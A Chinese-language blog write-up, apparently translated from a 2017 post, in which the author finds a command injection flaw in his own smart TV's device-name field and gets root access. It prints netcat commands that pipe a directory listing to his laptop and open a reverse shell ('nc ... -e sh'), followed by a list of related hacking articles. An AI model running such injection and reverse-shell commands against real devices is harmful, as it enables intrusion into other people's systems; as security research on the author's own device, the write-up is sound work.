看我如何躺在床上黑掉自家智能电视

那是一个慵懒的夜晚,经过了一天忙碌的工作之后,我只想躺在床上静静地看会儿电视。不过在此之前,有一个朋友送了我一台路由器,而我却在这台路由器中发现了一个安全漏洞,辛苦工作了一天,我也一直在努力克制自己不要再去想这个漏洞了,但是没办法,我还是不停地在想这个问题,因为能够在这种设备中发现漏洞绝对是一件非常有意思的事情,而这些漏洞不仅是普通用户无法发现的,而且甚至连产品的开发人员以及公司的技术支持部门都对此毫不知情。

故事开始

由于当晚我已经非常累了,因此我在电视上设置了一个睡眠时间之后便赶紧躺上床了。但是在设置睡眠时间的过程中出于职业本能,我翻看了一下设置选项菜单,看看有没有只对开发人员开放的功能。在用手机Google了一番之后,我发现这个牌子的智能电视有一个控制代码可以打开隐藏菜单。

接下来, 我通过远程控制在电视的设置菜单中输入了这段控制代码,然后屏幕左侧便弹出了一个菜单。但几乎所有的选项都是不可访问的,我只能访问其中一个名叫“Hotel Mode”(酒店模式)的选项,并查看电视的版本号。除此之外,还有一个名叫“info”(信息)的选项,打开它之后我发现了一件非常有意思的事情:我可以给我家的智能电视设置一个名字。

智能电视中的安全漏洞

如果你也是信息安全从业者,那么你可能会不由自主地在其他地方测试你平时所使用的payload,可以是路由器Web接口的一个GET参数,也可以是你打印机的控制面板,而我现在遇到的是一台智能电视。接下来,我突发奇想地把电视命名为了’sleep 5’。

设置完成之后,我的电视卡了好久都没响应。当它有反应之后,我又修改了电视的名称,我当时并不认为自己发现了一个命令注入漏洞,因为我的电视在更改设置之后,经常都会有几秒钟的卡顿,但这一次的卡得未免也有些太久了,所以这也勾起了我的好奇心。

由于卡顿时间已经超过了五秒,与电视名称里设置的‘5’并不匹配,因此我认为系统可能会对这个数字进行一些特殊处理。当然了,也有可能是因为电视不支持这个参数,而这个参数会引发电视出现异常,所以才会导致电视出现卡顿。但是当我尝试将其改名为‘sleep 0’之后,电视却并没有出现卡顿。

事实就摆在我的眼前,但是我却不知道其中缘由,所以我打算测量一下这个数字与时间之间的数学关系。原来,名称里的数字(我们所输入的)乘以3才是电视机真正的响应间隔时间,比如说:



sleep(2) – 6秒sleep(3) - 9秒sleep(5) - 15秒






在智能电视中执行远程命令


这你敢信?我的第一次尝试就找到了一个命令注入漏洞!但仅仅让菜单卡住并不能成为一个有说服力的PoC,而且在实际的漏洞利用过程中也没什么用。由于我们在这里只能输入31个字符,去掉两个引号之后,意味着我们的Payload只剩29个字符了。


下面给出的这个列表就是所以我尝试过的命令:




由于当时已是深夜,所以我果断上床睡觉了,并打算在第二天看看是否可以拿到电视机的shell。第二天起床之后,我便赶紧拿起笔记本电脑和网线开始干活,而让我欣喜若狂的是,我可以通过远程控制让智能电视运行系统指令。




拿到智能电视的Shell


我家的电视挂在墙上,所以插网线的过程让我有些“力不从心”,因为我的肩膀当时就因为这个弄脱臼了,但最终我还是把网线插了进去,然后与我的笔记本电脑相连接,并利用ipconfig命令查看笔记本的IP地址。




既然我已经知道了笔记本的IP地址,那么现在我只需要拿到笔记本的反向Shell(Reverse shell)即可,而无需知道电视机的IP地址。更重要的是,反向Shell可以绕过所有的防火墙规则(阻止进入的连接)。但是在此之前,我还需要更加深入地了解这台智能电视。


在智能电视上使用Netcat


我发现智能电视上默认安装了“nc”,所以我可以利用“nc”指令将特定命令的输出结果传回给笔记本电脑。当然了,我首先测试的是“id”,而运行结果可以让我知道自己是否拥有智能电视的root权限。




如上图所示,输出结果表明我已经拥有root权限了,虽然这没啥好惊讶的,但这仍是一个好消息。接下来,我准备利用`ls-la /|nc 169.254.56.216 5`这条命令来获取到根目录的文件列表。




目前一切顺利,但我还是没有拿到电视的Shell。考虑到电视机默认安装的“nc”版本允许我们使用“-e”参数,因此我们可以通过`nc 169.254.213.210 5 -e sh`这条命令来拿到一个反向Shell。






成功拿到智能电视的Shell


很好,我已经拿到了电视的Shell了,那么接下来的可能性就无限大了,比如说修改电视启动界面的Logo,或者修改应用的图标等等。由于这是一台智能电视,所以它会预安装很多例如Youtube或Skype这样的App。




我发现,智能电视绝大多数的文件系统都只有读权限(Read-Only),所以我没办法修改启动界面的Logo。但是电视里也有很多图片是会经常变化的,比如说当你在换频道的时候所显示的频道预览图,这些图片显示的就是各个频道的节目截图。很明显,这些图片需要在文件系统中的某个地方保存,而这个目录就是你可以实现读写的地方。


研究之后,我发现系统中所有的图标都是.png文件,但是当我通过命令“find/ -name *.png”来查找所有带有.png后缀的文件时,并没有找到这些预览图。然而,当我尝试用同样的方法搜索.jpg文件时,我发现了一些文件名类似channelImage123.jpg的文件,于是我便用其他的图片替换了相应的channelImage文件,结果如下图所示:




原文发布时间为:2017-04-21


本文来自合作伙伴“大数据文摘”,了解相关信息可以关注“BigDataDigest”微信公众号
				


				
时间: 2024-11-01 12:23:12

		
		


		


	

	
	

		


		
看我如何躺在床上黑掉自家智能电视的相关文章


								

		

			

                十秒内黑掉Fitbit智能手环(附视频)
			

		

		

									

				Fitbit是一款可以记录你锻炼和运动量的手环设备,很受人们欢迎.但新的研究表明,Fitbit设备抵御不了一个简单的恶意攻击.更重要的是,恶意程序可以在用户不知情的情况下发送到Fitbit设备上同时恶意程序可以感染同步数据采集的计算机上. 短时间内便可上传恶意程序 Fortinet公司的研究人员Axelle Apvrille发现了这种攻击行为,并写了关于这方面的报告. 最初的攻击行为发生在蓝牙,完成时间只需要10秒.黑客只需要在接近目标的发送恶意程序,然后等待目标连接到他或她的Fitbit设备到			

		

	

				

		

			

                看我如何黑掉PayPal:从任意文件上传到远程代码执行
			

		

		

									

				本文讲的是看我如何黑掉PayPal:从任意文件上传到远程代码执行, 漏洞发现过程 在上一篇文章中,我描述了我是如何破解OSCP证书的,破解起来非常困难,大概花了我四个多月的时间,但是我如果我不去挖漏洞的话,意味着我就没有零用钱了. 正常人的周末充满了饮料,派对,乐趣等等.或者看权力的游戏 ? 像我这样的人,在周末的时候,会看一些博客或者YouTube视频.我打了Burp(关闭了拦截器)并访问了PayPal的漏洞奖励计划页面,于是我发现了如下图所示的内容: 上图显示的是我访问http://payp			

		

	

				

		

			

                纯干货!阿里安全谢君:如何黑掉无人机
			

		

		

									

				无人机曾一度用来基础的地面侦查或是快餐店送披萨,应用场景越来越丰富.所以,无人机也被众多黑客盯上,他们热衷于找寻相关漏洞劫持无人机.而最近,在看雪安全开发者峰会上,阿里安全 IoT 安全研究团队 Leader 谢君发表了"如何黑掉无人机"这一议题演讲,内容却另辟蹊径讲到如何不利用漏洞 root 无人机.以下为谢君演讲实录, 谢君:我分享的议题是如何黑掉某品牌无人机.我在研究过程中从物理接触和非物理接触两个方面对整个无人机进行系统化的学习,今天我将分享研究过程中的一些收获以及学到的东西.			

		

	

				

		

			

                怎么用手机控制电脑 躺在床上也一样玩电脑
			

		

		

									

				平时有没有经历过这样的情况:想躺在床上玩电脑,但是用的是台式机,操作起来很不方便.有人说可以买个无线鼠标啊,是的,但是无线鼠标要额外花钱不是,还要傻乎乎的在手边放张鼠标垫--而且就算有了鼠标,键盘用起来也不方便啊.还有就是有些人喜欢躺在床上看视频,看着看着就准备睡觉了.但是一旦爬起来去关电脑,睡意都跑了一半了有木有? 现在是智能移动时代啦,这小小的问题,其实一部手机就可以解决了.只要在手机上装上一款鼠标模拟应用,你的手机就可以当作鼠标.键盘和遥控器使用了.鼠标模拟应用现在在各大应用市场上都能找到			

		

	

				

		

			

                阿里安全资深专家谢君:如何黑掉无人机
			

		

		

									

				2017年11月18日,看雪安全开发者峰会在北京举行.阿里安全资深专家谢君做了题为<如何黑掉无人机>的演讲,并现场演示如何远程劫持一台无人机,引发现场热烈的掌声. 以下为谢君的现场演讲内容. 如何黑掉无人机 今天我分享的议题是如何黑掉某品牌的无人机.我在研究无人机的过程中从物理接触和非物理接触两个方面对整个无人机进行系统化的研究,研究的过程中其实也是一个学习的过程,所以今天我想跟大家分享一下我在这个研究过程中的一些收获和所学到的一些东西. 自我介绍一下,我现在是在阿里安全负责IoT安全攻防研究			

		

	

				

		

			

                离职员工一夜“黑掉”东家两网店
			

		

		

									

				晚报制图 邬思蓓 编者按:今日,本报与市公安局网安总队联合推出 "网警在线"专栏,使之成为网警与市民群众及时互动.有效沟通的窗口,并将其建设成警民联手共同预防网络犯罪的桥梁. 晚报记者 陆慧 报道 同行间恶意竞争,无所不用其极,一怒之下竟出手"黑"对方.黑客技术谁来管?今天上午,记者从上海市公安局网安总队获悉,截至今年3月底,本市网警共侦破黑客攻击案件10起,抓获20人.今年以来,共侦破网络违法犯罪案件1137起,抓获各类违法犯罪嫌疑人2017人,打击犯罪团伙275			

		

	

				

		

			

                注意!你的各种“账号”最近可能被轻松黑掉
			

		

		

									

				 4月1日消息,今天,乌云漏洞报告平台发文提醒,由于受到OAuth认证协议漏洞影响,大多数网友的网络账户很可能被黑客轻松黑掉.乌云漏洞平台介绍称,因为OAuth认证协议导致的安全风险,因企业的错误使用,可导致黑客利用这个漏洞登录该任意用户的账号(OAuth登录的用户).也就是说,在相关企业没有做出防范之前,你的各种网站.手机APP账号,甚至还包括网络名人的账户,都可能遭到黑客窥探. 下面是来自乌云漏洞报告平台的提醒: 问题来自前两天的中午,新浪发来一封漏洞预警邮件,印象中这好像是第一次企业发出如			

		

	

				

		

			

                “特斯拉破解第一人”又造出“万能车破解器”:黑掉一辆车有多简单?
			

		

		

									

				   在 SyScan 360 的上海会场上,破解特斯拉的第一人,360 车联网安全中心工程师刘健皓开玩笑说,在北京吃了三年烤鸭后(之前的 Syscan 360 在北京举办),终于可以来黄浦江的游艇上喝啤酒了. 看上去,一切都很土豪.轻松.有趣对吧?事实上,他下面要解密的事情会让你竖起汗毛--正儿八经买的一辆新车,可以轻而易举地被他开走?! 其实,在11月,刘健皓就展示了这一酷炫的技术.那是一个天空都飘着几个字:"不要惹黑客"的一天,360 公司大楼下列阵了二十几台豪车,利用神秘的技术			

		

	

				

		

			

                狂发外链真的会被搜索引擎黑掉吗?
			

		

		

									

				中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 因为看到近期很多人开始说发外链的事情,对于各种各样的说法进行了总结和思考,提出以下疑问,希望能和有志之士互相讨论. 质疑一:狂发外链真的会被搜索引擎黑掉吗? 很多人在文章中都提到了发外链不要多发,可以通过写软文的形式广加外链,甚至还提到了一天只写5到6篇的软文,从作者的口气以及给出的明确数字来看,的确很有让人信服的力量,可是细细想来,如果我跟